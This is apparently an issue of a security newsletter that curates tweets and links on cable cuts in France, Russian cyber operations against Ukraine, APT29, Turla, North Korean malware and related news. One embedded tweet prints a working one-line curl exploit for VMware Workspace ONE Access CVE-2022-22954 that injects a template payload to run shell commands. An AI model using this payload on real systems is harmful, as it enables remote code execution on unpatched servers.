April 28, 2022

                April 28, 2022

            April 28, 2022

            This story about cables cut in France is going to be interesting to follow.
Arthur P.B. Laudrain @APB_LaudrainMajor #internet cables physically cut at multiple places in Paris throughout the night. Some ISPs experiencing #outage over the country, increased latency for others. See for instance @netalisfr status.netalis.fr/issue/de7d81ed… 
9:51 AM ∙ Apr 27, 2022
243Likes183Retweets

Lots of attack in Ukraine, apparently.
𝕯𝖒𝖎𝖙𝖗𝖞 𝕾𝖒𝖎𝖑𝖞𝖆𝖓𝖊𝖙𝖘 @ddd1ms
According to the Computer Emergency Response Team of Ukraine, the country has recorded 802 cyberattacks since Russia invaded the country earlier this year. That compares to just 362 documented attacks during the same time last year, CERT-UA said.

therecord.mediaA deeper look at hacking groups and malware targeting UkraineUkraine’s main cybersecurity incident response team released a list on Friday of the five most persistent hacking groups attacking Ukraine’s critical infrastructure.4:26 PM ∙ Apr 27, 2022
14Likes10Retweets

Oh boy…
mtanji @mtanjiI'm trying to think of how they could have done worse...nope, think they nailed it.

taskandpurpose.comThe Air Force is trusting the internet to name its ridiculous new cybersecurity mascotThe U.S. Air Force has decided to ask the internet to help it name its cybersecurity mascot. What could possibly go wrong?3:53 PM ∙ Apr 27, 2022
9Likes4Retweets
Mandiant report linking the SolarWinds hack to APT29.

https://www.mandiant.com/resources/unc2452-merged-into-apt29

The Info Op is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.
Lots of Russian cyber activity linked to Ukraine, but more specifically linked to military actions. Here’s the report: 

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

Learn you some mobile phone security.
LaForge @LaF0rgeIf you ever want to manually go through the steps that happen when a SIM card is authenticated by 3G/4G/5G networks, see osmocom.org/projects/pysim… for a walkthrough using osmo-auc-gen and pySim. #gsm #cellular #osmocom
osmocom.orgManually Testing USIM Authentication - pySim - Open Source Mobile CommunicationsRedmine5:34 PM ∙ Apr 27, 2022
58Likes21Retweets
POC exploit for VMWare something. It fits in a tweet. Those are always cool.
wvu @wvuuuuuuuuuuuuu
Exploit for VMware Workspace ONE Access CVE-2022-22954:

curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
12:41 AM ∙ Apr 28, 2022
359Likes115Retweets

Couple of things here. Firstly, great thread. Secondly, the concept of stupid proofing equipment and tools to ensure that bad users can’t do the wrong thing… that’s powerful. It’s partially what mobile phones do to security. So many attack vectors don’t exist because they’re impossible within the constraints of the device. 
Trent Telenko @TrentTelenkoMissile container thread 🧵note the wooden boxes used to move Russian Kornet large vehicle anti-tank missiles.

You can learn a lot about real history versus 'narratives' by paying attention to them.

This thread will demonstrate why that is.

1/ OSINTtechnical @Osinttechnical
Kherson Oblast, abandoned Russian BTR-D, note the Kornet ATGM ammunition https://t.co/sIbwrUvIfN7:43 PM ∙ Apr 27, 2022
2,634Likes528RetweetsReport that he mentions is here

https://apps.dtic.mil/sti/citations/ADA259704

News these days can be a little bit too psychedelic sometimes 
H I Sutton @CovertShores
***BREAKING***

Evidence #Russian Navy trained dolphins deployed to entrance of Sevastopol Harbor during #Ukraine war. You heard it here first. 

First found in low-resolution Sentinel 2 imagery

Thx for help from @COUPSURE and unnamed others
news.usni.orgTrained Russian Navy Dolphins are Protecting Black Sea Naval Base, Satellite Photos Show - USNI NewsRussia has deployed trained dolphins during its invasion of Ukraine to protect a Black Sea naval base, USNI News has learned. The Russian Navy has placed two dolphin pens at the entrance to Sevastopol harbor, sheltered just inside a sea wall. The pens were moved there in February, around the time of…8:12 PM ∙ Apr 27, 2022
2,848Likes1,116Retweets
-
There’s a cyber war on. No, the other one.
Stairwell @InsideStairwell@silascutler, Stairwell principal reverse engineer, shares intel about #GOLDBACKDOOR, #APT37, and the Democratic People's Republic of Korea's history of cyber operations as a key means of supporting the regime.

bit.lyNorth Korean Hackers Target Journalists with GOLDBACKDOOR MalwareResearchers have uncovered a new campaign by a North Korean-backed hacking group targeting journalists covering the country.10:42 PM ∙ Apr 26, 2022
5Likes2Retweets-
More Turla. 
J. A. Guerrero-Saade @juanandres_gs
This didn't get nearly enough of attention so I'm bumping @hatr's amazing reporting on the Turla -> Ryazan connection. Our best to Vlad, Urik, and Gilg!
interaktiv.br.deThe Elite Hackers of the FSBFor almost two decades, hackers with Snake have been forcing their way into government networks. Who they work for, though, has always been a matter of pure speculation. But reporters with the German public broadcasters BR and WDR have discovered some clues, and they lead to Russia.12:32 AM ∙ Apr 28, 2022
29Likes13Retweets
-
A mention of the value of the satellite comms takedown which keeps being dismissed by many cyberwar analysts. 
David Patrikarakos @dpatrikarakos
"I want to say one thing: @elonmusk's Starlink is what changed the war in #Ukraine's favour. #Russia went out of its way to blow up all our comms. Now they can't. Starlink works under Katyusha fire, under artillery fire. It even works in Mariupol." 
1:12 PM ∙ Apr 27, 2022
12,262Likes2,687Retweets
-
Here’s the videos from Enigma 2022
Enigma Conference @enigmaconfThe videos from Enigma 2022 are now posted on the conference program page, and are freely available to watch thanks to USENIX's open access policy: bit.ly/enigma2022prog #enigma2022
bit.lyEnigma 2022 Conference ProgramEnigma 2022 will take place February 1–3, 2022, at the Hyatt Regency Santa Clara in Santa Clara, CA, USA. Enigma centers on a single track of engaging talks covering a wide range of topics in security and privacy. Our goal is to clearly explain emerging threats and defenses in the growing intersecti…7:34 PM ∙ Apr 27, 2022
17Likes11Retweets
Awesome, if true.

https://www.wired.com/story/north-korean-phone-jailbreakers/

A valid point.
Ian Miers @secparam
So @Snowden participated in the original Zcash set up ceremony. How did he go about getting/storing secure hardware? Peter Todd had his ninja alarm (a chair against the door), to guard against whimsical spies. But Snowden was, at least plausibly, under actual FSB surveillance.4:24 AM ∙ Apr 28, 2022
25Likes6Retweets
For what it’s worth, this exists. Not the sort of thing that floats my boat, but I’d remiss to ignore it.

https://www.whitehouse.gov/briefing-room/statements-releases/2022/04/28/fact-sheet-united-states-and-60-global-partners-launch-declaration-for-the-future-of-the-internet/

Thank you for reading The Info Op. This post is public so feel free to share it.
Share

Don't miss what's next. Subscribe to the grugq's newsletter: